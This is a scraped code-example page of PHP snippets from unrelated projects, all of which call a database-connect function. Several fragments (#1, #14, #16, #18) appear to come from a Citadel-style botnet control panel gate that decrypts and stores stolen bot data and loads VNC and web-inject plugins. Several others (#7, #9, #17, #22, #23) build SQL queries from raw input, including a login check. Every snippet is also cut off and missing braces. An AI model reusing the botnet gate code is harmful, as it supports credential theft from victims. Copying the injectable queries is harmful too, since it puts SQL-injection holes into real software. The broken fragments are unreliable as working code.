コード例 #1
 static function connect()
     if (empty($_SESSION['db-connect'])) {
     $conn =& $GLOBALS['config']['db-connect'][$_SESSION['db-connect']];
     if (empty($conn)) {
     # Close the previous connection
     # Attempt to connect
     $purl = parse_url($conn);
     $l = mysql_connect($purl['host'] . ':' . $purl['port'], $purl['user'], $purl['pass'], true);
     $ok = $l !== FALSE;
     if ($ok) {
         $ok = (bool) mysql_select_db(trim($purl['path'], '/'), $l);
     if ($ok) {
         $ok = (bool) mysql_query('SET NAMES "' . MYSQL_CODEPAGE . '" COLLATE "' . MYSQL_COLLATE . '";', $l);
     if (!$ok) {
         flashmsg('err', 'Citadel Connect: ":conn" failed! Error: ":error". Using the default connection instead', array(':conn' => $conn, ':error' => mysql_error($l)));
     # Warn
     flashmsg('info', 'Citadel Connect: Using ":db"', array(':db' => $_SESSION['db-connect']));
コード例 #2
 function checkCookie($input, $ipaddress)
     global $salt;
     /*$input comes in the following format userId-passwordhash
     		/*Validate that the cookie hash meets the following criteria:
     			Cookie Ip: matches $ipaddres;
     			Cookie Timeout: Is still greater then the current time();
     			Cookie Secret: matches the mysql database secret;
     //Split cookie into 2 mmmmm!
     $cookieInfo = explode("-", $input);
     $validCookie = false;
     //Get "secret" from MySql database
     $tempId = mysql_real_escape_string($cookieInfo[0]);
     if (!is_numeric($tempId)) {
         $tempId = 0;
         return false;
     $getSecretQ = mysql_query("SELECT secret, pass, sessionTimeoutStamp FROM webUsers WHERE id = {$tempId} LIMIT 0,1");
     if ($getSecret = mysql_fetch_object($getSecretQ)) {
         $password = $getSecret->pass;
         $secret = $getSecret->secret;
         $timeoutStamp = $getSecret->sessionTimeoutStamp;
         //Create a variable to test the cookie hash against
         $hashTest = hash("sha256", $secret . $password . $ipaddress . $timeoutStamp . $salt);
         //Test if $hashTest = $cookieInfo[1] hash value; return results
         if ($hashTest == $cookieInfo[1]) {
             $validCookie = true;
     return $validCookie;
コード例 #3
ファイル: base.php プロジェクト: Vesihiisi/bookmarker
function editQuery($query, $params)
    $db = connectToDb();
    $statement = $db->prepare($query);
    return $db->lastInsertId();
コード例 #4
ファイル: addNewZones.php プロジェクト: Vesihiisi/zoner
function insertZones($array)
    for ($i = 0; $i < count($array); ++$i) {
        $zoneID = $array[$i]["id"];
        $sql = "SELECT * FROM zones WHERE id=? LIMIT 1";
        $params = [$zoneID];
        $res = getFromDb($sql, $params);
        if (count($res) == 0) {
            $id = $zoneID;
            $name = $array[$i]["name"];
            $region = $array[$i]["region"]["id"];
            $totalTakeovers = $array[$i]["totalTakeovers"];
            $takeoverPoints = $array[$i]["takeoverPoints"];
            $pointsPerHour = $array[$i]["pointsPerHour"];
            $dateCreated = $array[$i]["dateCreated"];
            $longitude = $array[$i]["longitude"];
            $latitude = $array[$i]["latitude"];
            $params = [$id, $name, $region, $totalTakeovers, $takeoverPoints, $pointsPerHour, $dateCreated, $longitude, $latitude];
            $db = connectToDb(DATABASE);
            $query = "INSERT INTO zones VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);";
            $stmt = $db->prepare($query);
コード例 #5
ファイル: utils.php プロジェクト: Vesihiisi/zoner
function getFromDb($query, $params)
    $db = connectToDb(DATABASE);
    $stmt = $db->prepare($query);
    $res = $stmt->fetchAll(PDO::FETCH_ASSOC);
    return $res;
コード例 #6
ファイル: handlerDb.php プロジェクト: serradino/tinnitushunt
function getListZips()
    $database = connectToDb();
    if (!$database) {
        return false;
    $result = executeCommand($database, "getListOfZips", NULL);
    if (!$result) {
        return false;
    } else {
        return $result;
コード例 #7
function testDirectObjectRefs($arrayOfURLs, $testId)
    updateStatus($db, "Testing all URLs for Insecure Direct Object References...", $testId);
    $log = new Logger();
    $log->lwrite("Identifying which URLs have parameters");
    $log->lwrite("All URLs found during crawl:");
    $urlsWithParameters = array();
    foreach ($arrayOfURLs as $currentUrl) {
        if (strpos($currentUrl, "?")) {
            array_push($urlsWithParameters, $currentUrl);
    $log->lwrite("URLs with parameters:");
    foreach ($urlsWithParameters as $currentUrl) {
    $log->lwrite("Testing each URL that has parameters");
    foreach ($urlsWithParameters as $currentUrl) {
        $parsedUrl = parse_url($currentUrl);
        if ($parsedUrl) {
            $query = $parsedUrl['query'];
            $parameters = array();
            parse_str($query, $parameters);
            foreach ($parameters as $para) {
                if (preg_match('/\\.([^\\.]+)$/', $para)) {
                    //Check if this vulnerability has already been found and added to DB. If it hasn't, add it to DB.
                    $tableName = 'test' . $testId;
                    $query = "SELECT * FROM test_results WHERE test_id = {$testId} AND type = 'idor' AND method = 'get' AND url = '{$currentUrl}' AND attack_str = '{$para}'";
                    $result = $db->query($query);
                    if (!$result) {
                        $log->lwrite("Could not execute query {$query}");
                    } else {
                        $log->lwrite("Successfully executed query {$query}");
                        $numRows = $result->num_rows;
                        if ($numRows == 0) {
                            $log->lwrite("Number of rows is {$numRows} for query: {$query}");
                            insertTestResult($db, $testId, 'idor', 'get', $currentUrl, $para);
        } else {
            $log->lwrite("Could not parse malformed URL: {$currentUrl}");
コード例 #8
ファイル: emailPdfToUser.php プロジェクト: 3nj0y/webvulscan
function emailPdfToUser($fileName, $username, $email, $testId)
    updateStatus($db, "Emailing PDF report to {$email}...", $testId);
    $log = new Logger();
    $log->lwrite("Starting email PDF function for test: {$testId}");
    if (file_exists($fileName)) {
        $log->lwrite("File: {$fileName} exists");
        $fileatt = $fileName;
        // Path to the file
        $fileatt_type = "application/pdf";
        // File Type
        $fileatt_name = 'Test_' . $testId . '.pdf';
        // Filename that will be used for the file as the attachment
        $email_from = "*****@*****.**";
        // Who the email is from, don't think this does anything
        $email_subject = "WebVulScan Detailed Report";
        // The Subject of the email
        $email_message = "Hello {$username},<br><br>";
        $email_message .= 'Thank you for scanning with WebVulScan. Please find the scan results attached in the PDF report.<br><br>';
        $email_message .= 'Please reply to this email if you have any questions.<br><br>';
        $email_message .= 'Kind Regards,<br><br>';
        $email_message .= 'WebVulScan Team<br>';
        $email_to = $email;
        // Who the email is to
        $headers = "From: " . $email_from;
        $file = fopen($fileatt, 'rb');
        $data = fread($file, filesize($fileatt));
        $semi_rand = md5(time());
        $mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";
        $headers .= "\nMIME-Version: 1.0\n" . "Content-Type: multipart/mixed;\n" . " boundary=\"{$mime_boundary}\"";
        $email_message .= "This is a multi-part message in MIME format.\n\n" . "--{$mime_boundary}\n" . "Content-Type:text/html; charset=\"iso-8859-1\"\n" . "Content-Transfer-Encoding: 7bit\n\n" . ($email_message .= "\n\n");
        $data = chunk_split(base64_encode($data));
        $email_message .= "--{$mime_boundary}\n" . "Content-Type: {$fileatt_type};\n" . " name=\"{$fileatt_name}\"\n" . "Content-Transfer-Encoding: base64\n\n" . ($data .= "\n\n" . "--{$mime_boundary}--\n");
        $mailSent = mail($email_to, $email_subject, $email_message, $headers);
        if ($mailSent) {
            $log->lwrite("{$fileName} successfully sent to {$email}");
        } else {
            $log->lwrite("There was a problem sending {$fileName} to {$email}");
    } else {
        $log->lwrite("File: {$fileName} does not exist");
コード例 #9
ファイル: mycrawler.php プロジェクト: 3nj0y/webvulscan
 function handlePageData(&$page_data)
     array_push($this->urlsFound, $page_data["url"]);
     if ($this->firstCrawl) {
         $testId = $this->testId;
         $newUrl = $page_data['url'];
         $query = "UPDATE tests SET status = 'Found URL {$newUrl}' WHERE id = {$testId};";
         if (connectToDb($db)) {
             $query = "UPDATE tests SET numUrlsFound = numUrlsFound + 1 WHERE id = {$testId};";
             $query = "UPDATE tests SET urls_found=CONCAT(urls_found,'{$newUrl}<br>') WHERE id = {$testId};";
             //Nearly doubles the duration of the crawl
コード例 #10
ファイル: file_upload_sql.php プロジェクト: supergoose/hubub
function fileUploadComplete($filename = null)
    if ($filename == null) {
        die("Error: No filename for file upload");
    $conn = connectToDb();
    try {
        //Prepare SQL and bind parameters for insert
        $stmt = $conn->prepare("INSERT INTO Uploaded_Files (filename)\n\t\t\t\t\t\t\t\tVALUES (:filename)");
        $stmt->bindParam(':filename', $filename);
        return $conn->insert_id;
    } catch (PDOException $e) {
        die("Exception in SQL INSERT: " . $e);
コード例 #11
ファイル: simple_html_dom.php プロジェクト: 3nj0y/webvulscan
function file_get_html($url, $testId, $use_include_path = false, $context = null, $offset = -1, $maxLen = -1, $lowercase = true, $forceTagsClosed = true, $target_charset = DEFAULT_TARGET_CHARSET, $stripRN = true, $defaultBRText = DEFAULT_BR_TEXT)
    if ($db) {
        incrementHttpRequests($db, $testId);
    // We DO force the tags to be terminated.
    $dom = new simple_html_dom(null, $lowercase, $forceTagsClosed, $target_charset, $defaultBRText);
    // For sourceforge users: uncomment the next line and comment the retreive_url_contents line 2 lines down if it is not already done.
    $contents = file_get_contents($url, $use_include_path, $context, $offset);
    // Paperg - use our own mechanism for getting the contents as we want to control the timeout.
    //    $contents = retrieve_url_contents($url);
    if (empty($contents)) {
        return false;
    // The second parameter can force the selectors to all be lowercase.
    $dom->load($contents, $lowercase, $stripRN);
    return $dom;
コード例 #12
ファイル: updateZones.php プロジェクト: Vesihiisi/zoner
function updateZones($array)
    $time_start = microtime(true);
    for ($i = 0; $i < count($array); ++$i) {
        $id = $array[$i]["id"];
        $name = $array[$i]["name"];
        $region = $array[$i]["region"]["id"];
        $totalTakeovers = $array[$i]["totalTakeovers"];
        $takeoverPoints = $array[$i]["takeoverPoints"];
        $pointsPerHour = $array[$i]["pointsPerHour"];
        $longitude = $array[$i]["longitude"];
        $latitude = $array[$i]["latitude"];
        $db = connectToDb(DATABASE);
        $query = "UPDATE zones SET name = ?, region = ?, totalTakeovers = ?, takeoverPoints = ?, pointsPerHour = ?, longitude = ?, latitude = ? WHERE id = ?";
        $params = [$name, $region, $totalTakeovers, $takeoverPoints, $pointsPerHour, $longitude, $latitude, $id];
        $stmt = $db->prepare($query);
    $time_end = microtime(true);
    $execution_time = $time_end - $time_start;
    echo 'Total Execution Time: ' . $execution_time;
コード例 #13
ファイル: getzones.php プロジェクト: Vesihiisi/zoner
function insertRegions($array)
    for ($i = 0; $i < count($array); ++$i) {
        $regionID = $array[$i]["id"];
        $sql = "SELECT * FROM regions WHERE regionID=? LIMIT 1";
        $params = [$regionID];
        $res = getFromDb($sql, $params);
        if (count($res) == 0) {
            $regionName = $array[$i]["name"];
            if (array_key_exists("country", $array[$i])) {
                $country = $array[$i]["country"];
            } else {
                $country = null;
            $params = [$regionID, $regionName, $country];
            $db = connectToDb(DATABASE);
            $query = "INSERT INTO regions VALUES (?, ?, ?)";
            $stmt = $db->prepare($query);
コード例 #14
        @header('Status: 404 Not Found');
    } else {
        @header($_SERVER['SERVER_PROTOCOL'] . ' 404 Not Found');
if (file_exists('system/gate/gate.plugin.404.php')) {
    require 'system/gate/gate.plugin.404.php';
    die(function_exists('e404plugin_display') ? e404plugin_display() : die404('Not found'));
/* plugin: 404 */
if (function_exists('e404plugin_display') && !empty($config['allowed_countries_enabled'])) {
    # Analize IPv4 & Ban if needed
    if (connectToDb()) {
        $realIpv4 = trim(!empty($_GET['ip']) ? $_GET['ip'] : $_SERVER['REMOTE_ADDR']);
        $country = ipv4toc($realIpv4);
        if (!e404plugin_check($country)) {
//Получаем данные.
$data = @file_get_contents('php://input');
$dataSize = @strlen($data);
if ($dataSize < BOTCRYPT_MAX_SIZE) {
    rc4($data, $config['botnet_cryptkey_bin']);
コード例 #15
ファイル: http.php プロジェクト: 3nj0y/webvulscan
 function SendRequest($arguments)
     if ($db) {
         incrementHttpRequests($db, $this->testId);
     //fsockopen is called in receivePage below so increment HTTP requests sent
     if (strlen($this->error)) {
         return $this->error;
     if (isset($arguments["ProxyUser"])) {
         $this->proxy_request_user = $arguments["ProxyUser"];
     } elseif (isset($this->proxy_user)) {
         $this->proxy_request_user = $this->proxy_user;
     if (isset($arguments["ProxyPassword"])) {
         $this->proxy_request_password = $arguments["ProxyPassword"];
     } elseif (isset($this->proxy_password)) {
         $this->proxy_request_password = $this->proxy_password;
     if (isset($arguments["ProxyRealm"])) {
         $this->proxy_request_realm = $arguments["ProxyRealm"];
     } elseif (isset($this->proxy_realm)) {
         $this->proxy_request_realm = $this->proxy_realm;
     if (isset($arguments["ProxyWorkstation"])) {
         $this->proxy_request_workstation = $arguments["ProxyWorkstation"];
     } elseif (isset($this->proxy_workstation)) {
         $this->proxy_request_workstation = $this->proxy_workstation;
     switch ($this->state) {
         case "Disconnected":
             return $this->SetError("1 connection was not yet established");
         case "Connected":
             $connect = 0;
         case "ConnectedToProxy":
             if (strlen($error = $this->ConnectFromProxy($arguments, $headers))) {
                 return $error;
             $connect = 1;
             return $this->SetError("2 can not send request in the current connection state");
     if (isset($arguments["RequestMethod"])) {
         $this->request_method = $arguments["RequestMethod"];
     if (isset($arguments["User-Agent"])) {
         $this->user_agent = $arguments["User-Agent"];
     if (!isset($arguments["Headers"]["User-Agent"]) && strlen($this->user_agent)) {
         $arguments["Headers"]["User-Agent"] = $this->user_agent;
     if (isset($arguments["KeepAlive"])) {
         $this->keep_alive = intval($arguments["KeepAlive"]);
     if (!isset($arguments["Headers"]["Connection"]) && $this->keep_alive) {
         $arguments["Headers"]["Connection"] = 'Keep-Alive';
     if (isset($arguments["Accept"])) {
         $this->user_agent = $arguments["Accept"];
     if (!isset($arguments["Headers"]["Accept"]) && strlen($this->accept)) {
         $arguments["Headers"]["Accept"] = $this->accept;
     if (strlen($this->request_method) == 0) {
         return $this->SetError("3 it was not specified a valid request method");
     if (isset($arguments["RequestURI"])) {
         $this->request_uri = $arguments["RequestURI"];
     if (strlen($this->request_uri) == 0 || substr($this->request_uri, 0, 1) != "/") {
         return $this->SetError("4 it was not specified a valid request URI");
     $this->request_arguments = $arguments;
     $this->request_headers = isset($arguments["Headers"]) ? $arguments["Headers"] : array();
     $body_length = 0;
     $this->request_body = "";
     $get_body = 1;
     if ($this->request_method == "POST" || $this->request_method == "PUT") {
         if (isset($arguments['StreamRequest'])) {
             $get_body = 0;
             $this->request_headers["Transfer-Encoding"] = "chunked";
         } elseif (isset($arguments["PostFiles"]) || $this->force_multipart_form_post && isset($arguments["PostValues"])) {
             $boundary = "--" . md5(uniqid(time()));
             $this->request_headers["Content-Type"] = "multipart/form-data; boundary=" . $boundary . (isset($arguments["CharSet"]) ? "; charset=" . $arguments["CharSet"] : "");
             $post_parts = array();
             if (isset($arguments["PostValues"])) {
                 $values = $arguments["PostValues"];
                 if (GetType($values) != "array") {
                     return $this->SetError("5 it was not specified a valid POST method values array");
                 for (Reset($values), $value = 0; $value < count($values); Next($values), $value++) {
                     $input = Key($values);
                     $headers = "--" . $boundary . "\r\nContent-Disposition: form-data; name=\"" . $input . "\"\r\n\r\n";
                     $data = $values[$input];
                     $post_parts[] = array("HEADERS" => $headers, "DATA" => $data);
                     $body_length += strlen($headers) + strlen($data) + strlen("\r\n");
             $body_length += strlen("--" . $boundary . "--\r\n");
             $files = isset($arguments["PostFiles"]) ? $arguments["PostFiles"] : array();
             $end = GetType($input = Key($files)) != "string";
             for (; !$end;) {
                 if (strlen($error = $this->GetFileDefinition($files[$input], $definition))) {
                     return "3 " . $error;
                 $headers = "--" . $boundary . "\r\nContent-Disposition: form-data; name=\"" . $input . "\"; filename=\"" . $definition["NAME"] . "\"\r\nContent-Type: " . $definition["Content-Type"] . "\r\n\r\n";
                 $part = count($post_parts);
                 $post_parts[$part] = array("HEADERS" => $headers);
                 if (isset($definition["FILENAME"])) {
                     $post_parts[$part]["FILENAME"] = $definition["FILENAME"];
                     $data = "";
                 } else {
                     $data = $definition["DATA"];
                 $post_parts[$part]["DATA"] = $data;
                 $body_length += strlen($headers) + $definition["Content-Length"] + strlen("\r\n");
                 $end = GetType($input = Key($files)) != "string";
             $get_body = 0;
         } elseif (isset($arguments["PostValues"])) {
             $values = $arguments["PostValues"];
             if (GetType($values) != "array") {
                 return $this->SetError("5 it was not specified a valid POST method values array");
             for (Reset($values), $value = 0; $value < count($values); Next($values), $value++) {
                 $k = Key($values);
                 if (GetType($values[$k]) == "array") {
                     for ($v = 0; $v < count($values[$k]); $v++) {
                         if ($value + $v > 0) {
                             $this->request_body .= "&";
                         $this->request_body .= UrlEncode($k) . "=" . UrlEncode($values[$k][$v]);
                 } else {
                     if ($value > 0) {
                         $this->request_body .= "&";
                     $this->request_body .= UrlEncode($k) . "=" . UrlEncode($values[$k]);
             $this->request_headers["Content-Type"] = "application/x-www-form-urlencoded" . (isset($arguments["CharSet"]) ? "; charset=" . $arguments["CharSet"] : "");
             $get_body = 0;
     if ($get_body && (isset($arguments["Body"]) || isset($arguments["BodyStream"]))) {
         if (isset($arguments["Body"])) {
             $this->request_body = $arguments["Body"];
         } else {
             $stream = $arguments["BodyStream"];
             $this->request_body = "";
             for ($part = 0; $part < count($stream); $part++) {
                 if (isset($stream[$part]["Data"])) {
                     $this->request_body .= $stream[$part]["Data"];
                 } elseif (isset($stream[$part]["File"])) {
                     if (!($file = @fopen($stream[$part]["File"], "rb"))) {
                         return $this->SetPHPError("could not open upload file " . $stream[$part]["File"], $php_errormsg);
                     while (!feof($file)) {
                         if (GetType($block = @fread($file, $this->file_buffer_length)) != "string") {
                             $error = $this->SetPHPError("could not read body stream file " . $stream[$part]["File"], $php_errormsg);
                             return $error;
                         $this->request_body .= $block;
                 } else {
                     return "5 it was not specified a valid file or data body stream element at position " . $part;
         if (!isset($this->request_headers["Content-Type"])) {
             $this->request_headers["Content-Type"] = "application/octet-stream" . (isset($arguments["CharSet"]) ? "; charset=" . $arguments["CharSet"] : "");
     if (isset($arguments["AuthUser"])) {
         $this->request_user = $arguments["AuthUser"];
     } elseif (isset($this->user)) {
         $this->request_user = $this->user;
     if (isset($arguments["AuthPassword"])) {
         $this->request_password = $arguments["AuthPassword"];
     } elseif (isset($this->password)) {
         $this->request_password = $this->password;
     if (isset($arguments["AuthRealm"])) {
         $this->request_realm = $arguments["AuthRealm"];
     } elseif (isset($this->realm)) {
         $this->request_realm = $this->realm;
     if (isset($arguments["AuthWorkstation"])) {
         $this->request_workstation = $arguments["AuthWorkstation"];
     } elseif (isset($this->workstation)) {
         $this->request_workstation = $this->workstation;
     if (strlen($this->proxy_host_name) == 0 || $connect) {
         $request_uri = $this->request_uri;
     } else {
         switch (strtolower($this->protocol)) {
             case "http":
                 $default_port = 80;
             case "https":
                 $default_port = 443;
         $request_uri = strtolower($this->protocol) . "://" . $this->host_name . ($this->host_port == 0 || $this->host_port == $default_port ? "" : ":" . $this->host_port) . $this->request_uri;
     if ($this->use_curl) {
         $version = GetType($v = curl_version()) == "array" ? isset($v["version"]) ? $v["version"] : "0.0.0" : (preg_match("/^libcurl\\/([0-9]+\\.[0-9]+\\.[0-9]+)/", $v, $m) ? $m[1] : "0.0.0");
         $curl_version = 100000 * intval($this->Tokenize($version, ".")) + 1000 * intval($this->Tokenize(".")) + intval($this->Tokenize(""));
         $protocol_version = $curl_version < 713002 ? "1.0" : $this->protocol_version;
     } else {
         $protocol_version = $this->protocol_version;
     $this->request = $this->request_method . " " . $request_uri . " HTTP/" . $protocol_version;
     if ($body_length || ($body_length = strlen($this->request_body))) {
         $this->request_headers["Content-Length"] = $body_length;
     for ($headers = array(), $host_set = 0, Reset($this->request_headers), $header = 0; $header < count($this->request_headers); Next($this->request_headers), $header++) {
         $header_name = Key($this->request_headers);
         $header_value = $this->request_headers[$header_name];
         if (GetType($header_value) == "array") {
             for (Reset($header_value), $value = 0; $value < count($header_value); Next($header_value), $value++) {
                 $headers[] = $header_name . ": " . $header_value[Key($header_value)];
         } else {
             $headers[] = $header_name . ": " . $header_value;
         if (strtolower(Key($this->request_headers)) == "host") {
             $this->request_host = strtolower($header_value);
             $host_set = 1;
     if (!$host_set) {
         $headers[] = "Host: " . $this->host_name;
         $this->request_host = strtolower($this->host_name);
     if (count($this->cookies)) {
         $cookies = array();
         $this->PickCookies($cookies, 0);
         if (strtolower($this->protocol) == "https") {
             $this->PickCookies($cookies, 1);
         if (count($cookies)) {
             $h = count($headers);
             $headers[$h] = "Cookie:";
             for (Reset($cookies), $cookie = 0; $cookie < count($cookies); Next($cookies), $cookie++) {
                 $cookie_name = Key($cookies);
                 $headers[$h] .= " " . $cookie_name . "=" . $cookies[$cookie_name]["value"] . ";";
     $next_state = "RequestSent";
     if ($this->use_curl) {
         if (isset($arguments['StreamRequest'])) {
             return $this->SetError("Streaming request data is not supported when using Curl");
         if ($body_length && strlen($this->request_body) == 0) {
             for ($request_body = "", $success = 1, $part = 0; $part < count($post_parts); $part++) {
                 $request_body .= $post_parts[$part]["HEADERS"] . $post_parts[$part]["DATA"];
                 if (isset($post_parts[$part]["FILENAME"])) {
                     if (!($file = @fopen($post_parts[$part]["FILENAME"], "rb"))) {
                         $this->SetPHPError("could not open upload file " . $post_parts[$part]["FILENAME"], $php_errormsg);
                         $success = 0;
                     while (!feof($file)) {
                         if (GetType($block = @fread($file, $this->file_buffer_length)) != "string") {
                             $this->SetPHPError("could not read upload file", $php_errormsg);
                             $success = 0;
                         $request_body .= $block;
                     if (!$success) {
                 $request_body .= "\r\n";
             $request_body .= "--" . $boundary . "--\r\n";
         } else {
             $request_body = $this->request_body;
         curl_setopt($this->connection, CURLOPT_HEADER, 1);
         curl_setopt($this->connection, CURLOPT_RETURNTRANSFER, 1);
         if ($this->timeout) {
             curl_setopt($this->connection, CURLOPT_TIMEOUT, $this->timeout);
         curl_setopt($this->connection, CURLOPT_SSL_VERIFYPEER, 0);
         curl_setopt($this->connection, CURLOPT_SSL_VERIFYHOST, 0);
         $request = $this->request . "\r\n" . implode("\r\n", $headers) . "\r\n\r\n" . $request_body;
         curl_setopt($this->connection, CURLOPT_CUSTOMREQUEST, $request);
         if ($this->debug) {
             $this->OutputDebug("C " . $request);
         if (!($success = strlen($this->response = curl_exec($this->connection)) != 0)) {
             $error = curl_error($this->connection);
             $this->SetError("Could not execute the request" . (strlen($error) ? ": " . $error : ""));
     } else {
         if ($success = $this->PutLine($this->request)) {
             for ($header = 0; $header < count($headers); $header++) {
                 if (!($success = $this->PutLine($headers[$header]))) {
             if ($success && ($success = $this->PutLine(""))) {
                 if (isset($arguments['StreamRequest'])) {
                     $next_state = "SendingRequestBody";
                 } elseif ($body_length) {
                     if (strlen($this->request_body)) {
                         $success = $this->PutData($this->request_body);
                     } else {
                         for ($part = 0; $part < count($post_parts); $part++) {
                             if (!($success = $this->PutData($post_parts[$part]["HEADERS"])) || !($success = $this->PutData($post_parts[$part]["DATA"]))) {
                             if (isset($post_parts[$part]["FILENAME"])) {
                                 if (!($file = @fopen($post_parts[$part]["FILENAME"], "rb"))) {
                                     $this->SetPHPError("could not open upload file " . $post_parts[$part]["FILENAME"], $php_errormsg);
                                     $success = 0;
                                 while (!feof($file)) {
                                     if (GetType($block = @fread($file, $this->file_buffer_length)) != "string") {
                                         $this->SetPHPError("could not read upload file", $php_errormsg);
                                         $success = 0;
                                     if (!($success = $this->PutData($block))) {
                                 if (!$success) {
                             if (!($success = $this->PutLine(""))) {
                         if ($success) {
                             $success = $this->PutLine("--" . $boundary . "--");
                     if ($success) {
                         $sucess = $this->FlushData();
     if (!$success) {
         return $this->SetError("5 could not send the HTTP request: " . $this->error);
     $this->state = $next_state;
     return "";
コード例 #16
ファイル: gate.php プロジェクト: sucof/footlocker
//Парсим данные (Сжатие данных не поддерживается).
//Поздравляю мега хакеров, этот алгоритм позволит вам спокойно читать данные бота. Не забудьте написать 18 парсеров и 100 бэкдоров.
$list = array();
for ($i = HEADER_SIZE; $i < $dataSize;) {
    $k = @unpack('L4', @substr($data, $i, ITEM_HEADER_SIZE));
    $list[$k[1]] = @substr($data, $i + ITEM_HEADER_SIZE, $k[3]);
    $i += ITEM_HEADER_SIZE + $k[3];
//Основные параметры, которые должны быть всегда.
if (empty($list[SBCID_BOT_VERSION]) || empty($list[SBCID_BOT_ID])) {
//Подключаемся к базе.
if (!connectToDb()) {
// Обрабатываем данные.
$botId = str_replace("", "", trim($list[SBCID_BOT_ID]));
$botIdQ = addslashes($botId);
$botnet = empty($list[SBCID_BOTNET]) ? DEFAULT_BOTNET : str_replace("", "", trim($list[SBCID_BOTNET]));
$botnetQ = addslashes($botnet);
$botVersion = toUint($list[SBCID_BOT_VERSION]);
$realIpv4 = trim(!empty($_GET['ip']) ? $_GET['ip'] : $_SERVER['REMOTE_ADDR']);
$country = getCountryIpv4();
//str_replace("\x01", "\x02", GetCountryIPv4());
$countryQ = addslashes($country);
$curTime = time();
コード例 #17
ファイル: model.php プロジェクト: stevelyall/AppAutoTestSite
function clearFlag($flagName)
    $connection = connectToDb();
    $query = "UPDATE flags SET value = 0 where name = '{$flagName}';";
    $result = mysqli_query($connection, $query);
    if (!$result) {
        die("Updating flags failed" . mysqli_error($connection));
コード例 #18
# Load libs
require_once 'system/lib/notify.php';
# Load plugins
foreach (array('vnc', 'accparse', '404', 'webinjects') as $plugin) {
    if (file_exists($f = "system/gate/gate.plugin.{$plugin}.php")) {
        include $f;
    die(function_exists('e404plugin_display') ? e404plugin_display() : '');
# Init logging
new GateLog(__FILE__ . '.log', GATE_DEBUG_MODE ? GateLog::L_TRACE : GateLog::L_NOTICE);
set_error_handler(array(GateLog::get(), 'php_error_handler'));
# DB connect
if (!connectToDb(MYSQL_PERSISTENT_MODE)) {
    gate_die('init', 'DB connection failed');
    GateLog::get()->log(GateLog::L_TRACE, 'init', 'STARTED>>>>>>');
    function _logshutdown()
        GateLog::get()->log(GateLog::L_TRACE, 'init', '<<<<<<FINISHED');
# Analize IPv4 & Ban if needed
$realIpv4 = trim(!empty($_GET['ip']) ? $_GET['ip'] : $_SERVER['REMOTE_ADDR']);
# GeoIP lookup has proved itself to be rather expensive: now it's switchable
コード例 #19
ファイル: database.php プロジェクト: jones139/ChEWS
function writeToDb($word, $success)
    # write $word to the db.  If it already exists, the word count in
    # the database is incremented instead.
    global $debug;
    $word = strtolower($word);
    $count = isWordInDb($word);
    $wordcount = getWordcount($word);
    if ($debug) {
        echo "writeToDb - word=" . $word . ", success=" . $success . ", count=" . $count . ", wordcount=" . $wordcount . "<br/>";
    if ($wordcount > 0) {
        if ($debug) {
            echo "incrementing word count<br/>";
    } else {
        if ($debug) {
            echo "Inserting record into database<br/>";
        $conn = connectToDb();
        $sql = "insert into words(word,success,wordcount) " . "values(?, ?, 1)";
        if ($debug) {
            echo "sql=" . $sql . "<br/>";
        $smt = $conn->prepare($sql);
        $smt->bind_param("si", $word, $success);
        if ($smt->execute() === TRUE) {
            if ($debug) {
                echo "New record created successfully";
        } else {
            echo "Error: " . $sql . "<br>" . $conn->error;
コード例 #20
require_once 'cliCommon.php';
require_once 'dbConnect.php';
ini_set('display_errors', 1);
$args = array('input_file' => '');
$switches = array();
check_args($argc, $argv, $args, $switches);
//$host = 'localhost';
// Open input and output files
$inputFile = fopen($args['input_file'], 'r');
if ($inputFile === FALSE) {
    die("Could not open input file.\n");
$db = connectToDb();
if (!$db) {
    die('Could not connect to database.\\n');
// Parse CSV input into fields line by line
while (($line = fgetcsv($inputFile, 0, '|')) !== FALSE) {
    foreach ($line as $key => $element) {
        $line[$key] = pg_escape_string($element);
    $bannerId = $line[0];
    if ($bannerId == '') {
    $firstName = $line[2];
    $middleName = $line[3];
    $lastName = $line[1];
コード例 #21

include 'edit-recipe-form-handler.php';
include 'create-recipe-form.php';
include 'db-credentials.php';
//check if valid url or logged in
if (!isset($_GET['recipe_id']) || !isset($_SESSION['loggedin'])) {
    header('Location: fail.php');
//get recipe id
$recipeId = $_GET['recipe_id'];
//get logged username
$user = $_SESSION["username"];
//connect to db
$conn = connectToDb($servername, $username, $password, $dbname);
//get recipe name
$recipeName = getRecipeNameFromDB($conn, $recipeId);
//get author name
$authorName = getAuthorName($conn, $recipeId);
//check if valid id or not original author
if ($recipeName == '' || $authorName != $user) {
    header('Location: fail.php');
//if submit
    //delete everything
    removeRecipe($conn, $recipeId);
    header('Location: my-recipes.php');
コード例 #22
ファイル: session_control.php プロジェクト: 3nj0y/webvulscan
            $loginMsg = 'You are now logged out';
        } else {
            $loginMsg = 'You are currently not logged in';
//Check if user has just made a login attempt
if (isset($_POST['email']) && isset($_POST['password'])) {
    $email = $_POST['email'];
    $password = $_POST['password'];
    $continueLogin = true;
    if (!filter_var($email, FILTER_VALIDATE_EMAIL) || !ctype_alnum($password)) {
        $loginMsg = 'Invalid email or password. Please try again';
        $continueLogin = false;
    if (connectToDb($db) && $continueLogin) {
        $query = "SELECT * FROM users WHERE email = '{$email}' AND password = SHA1('{$password}')";
        $result = $db->query($query);
        if ($result) {
            $numRows = $result->num_rows;
            if ($numRows == 0) {
                $loginMsg = 'Invalid email or password. Please try again';
            } else {
                $row = $result->fetch_object();
                $username = $row->username;
                $_SESSION['username'] = $username;
                $_SESSION['email'] = $email;
                $loginMsg = 'You have successfully logged in';
        } else {
            $loginMsg = 'There was a problem checking your credentials. Please contact administrator if the problem persists';
コード例 #23
ファイル: createPdfReport.php プロジェクト: 3nj0y/webvulscan
function compareVulns($vulnOneId, $vulnTwoId)
    if (!connectToDb($db)) {
        return 0;
    $queryOne = "SELECT * FROM vulnerabilities WHERE id = '{$vulnOneId}'";
    $queryTwo = "SELECT * FROM vulnerabilities WHERE id = '{$vulnTwoId}'";
    $resultOne = $db->query($queryOne);
    $resultTwo = $db->query($queryTwo);
    if (!($resultOne && $resultTwo)) {
        return 0;
    $rowOne = $resultOne->fetch_object();
    $rowTwo = $resultTwo->fetch_object();
    $vulnOnePriority = $rowOne->priority_num;
    $vulnTwoPriority = $rowTwo->priority_num;
    if ($vulnOnePriority == $vulnTwoPriority) {
        return 0;
    } else {
        if ($vulnOnePriority > $vulnTwoPriority) {
            return -1;
        } else {
            //$vulnOnePriority < $vulnTwoPriority
            return 1;
コード例 #24
